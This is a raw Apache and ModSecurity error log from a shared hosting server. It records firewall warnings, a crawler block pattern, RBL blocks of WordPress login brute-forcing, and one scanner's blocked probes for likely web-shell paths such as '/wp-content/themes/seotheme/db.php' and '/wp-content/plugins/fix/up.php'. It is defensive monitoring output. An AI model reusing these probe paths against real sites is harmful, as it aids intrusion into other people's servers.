[Tue May 26 17:51:39.662194 2026] [security2:error] [pid 937900:tid 938002] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWKwAAy2U"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.664262 2026] [security2:error] [pid 937900:tid 938133] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWLwAA7C4"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.664804 2026] [security2:error] [pid 937900:tid 938099] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWHQAAymA"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.666704 2026] [security2:error] [pid 937900:tid 938154] [client 85.208.96.201:39784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahWQU04hPNS8CpkGLtbWNQAAAQE"]
[Tue May 26 17:51:39.666798 2026] [security2:error] [pid 937900:tid 938154] [client 85.208.96.201:39784] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahWQU04hPNS8CpkGLtbWNQAAAQE"]
[Tue May 26 17:51:39.669320 2026] [security2:error] [pid 937900:tid 938134] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWMAAA7Sg"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.672802 2026] [security2:error] [pid 937900:tid 938155] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWLAABAgA"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.678256 2026] [security2:error] [pid 937900:tid 938024] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWLgAA-ns"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.684593 2026] [security2:error] [pid 937900:tid 938091] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWJwAAwl0"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.687540 2026] [security2:error] [pid 937900:tid 938136] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWLQAA72k"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.751533 2026] [security2:error] [pid 937900:tid 938090] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWNgAAwTo"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.756891 2026] [security2:error] [pid 937900:tid 938066] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWOAAAqX8"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.761129 2026] [security2:error] [pid 937900:tid 938120] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWNwAA3wk"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:39.761332 2026] [security2:error] [pid 937900:tid 938092] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWOQAAwzc"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:40.503497 2026] [security2:error] [pid 937900:tid 938138] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQVE4hPNS8CpkGLtbWRQAAAPE"]
[Tue May 26 17:51:43.321791 2026] [security2:error] [pid 937900:tid 938102] [client 58.216.109.8:22455] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWQVk4hPNS8CpkGLtbWlgAAAM0"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 17:51:43.458410 2026] [security2:error] [pid 937900:tid 938097] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQV04hPNS8CpkGLtbWngAAAMg"]
[Tue May 26 17:51:44.664522 2026] [security2:error] [pid 937900:tid 938049] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQU04hPNS8CpkGLtbWGwAAtmY"], referer: https://ndequipments.com/listings/2007-kubota-m105s-105-hp-loader-tractor/
[Tue May 26 17:51:45.396532 2026] [security2:error] [pid 937900:tid 938054] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQWE4hPNS8CpkGLtbWyQAAAJ0"]
[Tue May 26 17:51:47.540843 2026] [security2:error] [pid 937900:tid 938048] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQW04hPNS8CpkGLtbXAQAAAJc"]
[Tue May 26 17:51:48.961772 2026] [security2:error] [pid 937900:tid 937937] [remote 173.249.15.100:58558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQXE4hPNS8CpkGLtbXLQAAiCQ"]
[Tue May 26 17:51:49.869601 2026] [security2:error] [pid 937900:tid 938048] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQXU4hPNS8CpkGLtbXRAAAAJc"]
[Tue May 26 17:51:51.362972 2026] [security2:error] [pid 937900:tid 938117] [client 94.26.106.90:57121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.toronto121mortgage.com"] [uri "/wp-login.php"] [unique_id "ahWQX04hPNS8CpkGLtbXbAAAANw"]
[Tue May 26 17:51:51.735569 2026] [security2:error] [pid 937900:tid 938086] [client 94.26.106.90:59082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.toronto121mortgage.com"] [uri "/wp-login.php"] [unique_id "ahWQX04hPNS8CpkGLtbXggAAAL0"], referer: https://duckduckgo.com/
[Tue May 26 17:51:52.150861 2026] [security2:error] [pid 937900:tid 938031] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQX04hPNS8CpkGLtbXgwAAAIY"]
[Tue May 26 17:51:54.585560 2026] [security2:error] [pid 937900:tid 938152] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQYk4hPNS8CpkGLtbYAgAAAP8"]
[Tue May 26 17:51:55.302722 2026] [security2:error] [pid 937900:tid 938115] [client 195.178.110.204:48590] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "162.222.227.191"] [uri "/index.html"] [unique_id "ahWQY04hPNS8CpkGLtbYIwAAANo"]
[Tue May 26 17:51:55.921112 2026] [security2:error] [pid 937900:tid 938090] [client 172.226.56.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWQY04hPNS8CpkGLtbYMAAAAME"]
[Tue May 26 17:51:57.120450 2026] [security2:error] [pid 937900:tid 938153] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQZE4hPNS8CpkGLtbYSQAAAQA"]
[Tue May 26 17:51:58.686654 2026] [core:error] [pid 937900:tid 938042] [client 74.7.241.160:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:51:58.686680 2026] [core:error] [pid 937900:tid 938042] [client 74.7.241.160:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:51:58.686821 2026] [security2:error] [pid 937900:tid 938042] [client 74.7.241.160:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.taotechservices.com"] [uri "/___proxy_subdomain_webmail/index.php"] [unique_id "ahWQZk4hPNS8CpkGLtbYegAAAJE"]
[Tue May 26 17:51:58.687503 2026] [security2:error] [pid 937900:tid 938034] [client 74.7.241.160:41600] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.taotechservices.com"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWQZk4hPNS8CpkGLtbYeAAAiTo"]
[Tue May 26 17:51:59.266533 2026] [core:error] [pid 937900:tid 938147] [client 45.154.98.236:57068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 17:51:59.266561 2026] [core:error] [pid 937900:tid 938147] [client 45.154.98.236:57068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 17:51:59.312437 2026] [security2:error] [pid 937900:tid 938112] [client 45.154.98.236:57151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWQZ04hPNS8CpkGLtbYiwAAANc"], referer: www.google.com
[Tue May 26 17:51:59.320602 2026] [security2:error] [pid 937900:tid 938052] [client 45.154.98.236:57205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWQZ04hPNS8CpkGLtbYjQAAAJs"], referer: www.google.com
[Tue May 26 17:51:59.420985 2026] [security2:error] [pid 937900:tid 938122] [client 45.154.98.236:57302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWQZ04hPNS8CpkGLtbYlQAAAOE"]
[Tue May 26 17:51:59.439068 2026] [autoindex:error] [pid 937900:tid 938123] [client 45.154.98.236:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/new/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:51:59.590716 2026] [security2:error] [pid 937900:tid 938087] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQZ04hPNS8CpkGLtbYigAAAL4"]
[Tue May 26 17:51:59.605428 2026] [core:error] [pid 937900:tid 938137] [client 45.154.98.236:65025] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 17:51:59.605451 2026] [core:error] [pid 937900:tid 938137] [client 45.154.98.236:65025] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 17:51:59.743371 2026] [security2:error] [pid 937900:tid 938133] [client 45.154.98.236:51344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/yqhqjedm.php"] [unique_id "ahWQZ04hPNS8CpkGLtbYowAAAOw"], referer: www.google.com
[Tue May 26 17:51:59.800674 2026] [security2:error] [pid 937900:tid 938073] [client 45.154.98.236:62653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWQZ04hPNS8CpkGLtbYpAAAALA"], referer: www.google.com
[Tue May 26 17:51:59.887752 2026] [security2:error] [pid 937900:tid 938030] [client 45.154.98.236:57227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWQZ04hPNS8CpkGLtbYqwAAAIU"], referer: www.google.com
[Tue May 26 17:52:00.327074 2026] [security2:error] [pid 937900:tid 938036] [client 45.154.98.236:63396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/psswstqd.php"] [unique_id "ahWQaE4hPNS8CpkGLtbYuAAAAIs"], referer: www.google.com
[Tue May 26 17:52:00.636202 2026] [security2:error] [pid 937900:tid 938095] [client 88.162.13.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQaE4hPNS8CpkGLtbYtAAAAMY"]
[Tue May 26 17:52:01.055275 2026] [security2:error] [pid 937900:tid 938049] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQaE4hPNS8CpkGLtbYwAAAAJg"]
[Tue May 26 17:52:01.968095 2026] [security2:error] [pid 937900:tid 938116] [client 45.154.98.236:51837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWQaU4hPNS8CpkGLtbY5AAAANs"], referer: www.google.com
[Tue May 26 17:52:01.973438 2026] [security2:error] [pid 937900:tid 938152] [client 45.154.98.236:51839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWQaU4hPNS8CpkGLtbY5QAAAP8"], referer: www.google.com
[Tue May 26 17:52:02.069281 2026] [security2:error] [pid 937900:tid 938086] [client 43.173.173.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWQaU4hPNS8CpkGLtbY2wAAAL0"]
[Tue May 26 17:52:02.086636 2026] [security2:error] [pid 937900:tid 938033] [client 43.173.180.200:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWQaU4hPNS8CpkGLtbY3gAAAIg"]
[Tue May 26 17:52:02.130242 2026] [autoindex:error] [pid 937900:tid 938130] [client 45.154.98.236:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:52:02.140520 2026] [security2:error] [pid 937900:tid 938103] [client 45.154.98.236:63912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWQak4hPNS8CpkGLtbY8QAAAM4"]
[Tue May 26 17:52:02.267346 2026] [security2:error] [pid 937900:tid 938076] [client 45.154.98.236:62823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/iprvsusk.php"] [unique_id "ahWQak4hPNS8CpkGLtbY9AAAALM"], referer: www.google.com
[Tue May 26 17:52:02.427558 2026] [security2:error] [pid 937900:tid 938044] [client 45.154.98.236:63462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWQak4hPNS8CpkGLtbY-QAAAJM"], referer: www.google.com
[Tue May 26 17:52:02.427804 2026] [security2:error] [pid 937900:tid 938138] [client 45.154.98.236:51835] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWQak4hPNS8CpkGLtbY-gAAAPE"], referer: www.google.com
[Tue May 26 17:52:02.938806 2026] [security2:error] [pid 937900:tid 938060] [client 45.154.98.236:64714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/iugmcadf.php"] [unique_id "ahWQak4hPNS8CpkGLtbZBAAAAKM"], referer: www.google.com
[Tue May 26 17:52:03.935753 2026] [security2:error] [pid 937900:tid 938136] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQa04hPNS8CpkGLtbZIgAAAO8"]
[Tue May 26 17:52:06.278131 2026] [security2:error] [pid 937900:tid 938155] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQbU4hPNS8CpkGLtbZXQAAAQI"]
[Tue May 26 17:52:08.782646 2026] [security2:error] [pid 937900:tid 938062] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQcE4hPNS8CpkGLtbZnwAAAKU"]
[Tue May 26 17:52:10.957670 2026] [security2:error] [pid 937900:tid 938136] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQck4hPNS8CpkGLtbZygAAAO8"]
[Tue May 26 17:52:11.845661 2026] [security2:error] [pid 937900:tid 938051] [client 142.147.161.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWQc04hPNS8CpkGLtbZ4gAAAJo"]
[Tue May 26 17:52:13.324674 2026] [security2:error] [pid 937900:tid 938113] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQdE4hPNS8CpkGLtbaDgAAANg"]
[Tue May 26 17:52:15.948304 2026] [security2:error] [pid 937900:tid 938038] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQd04hPNS8CpkGLtbaVgAAAI0"]
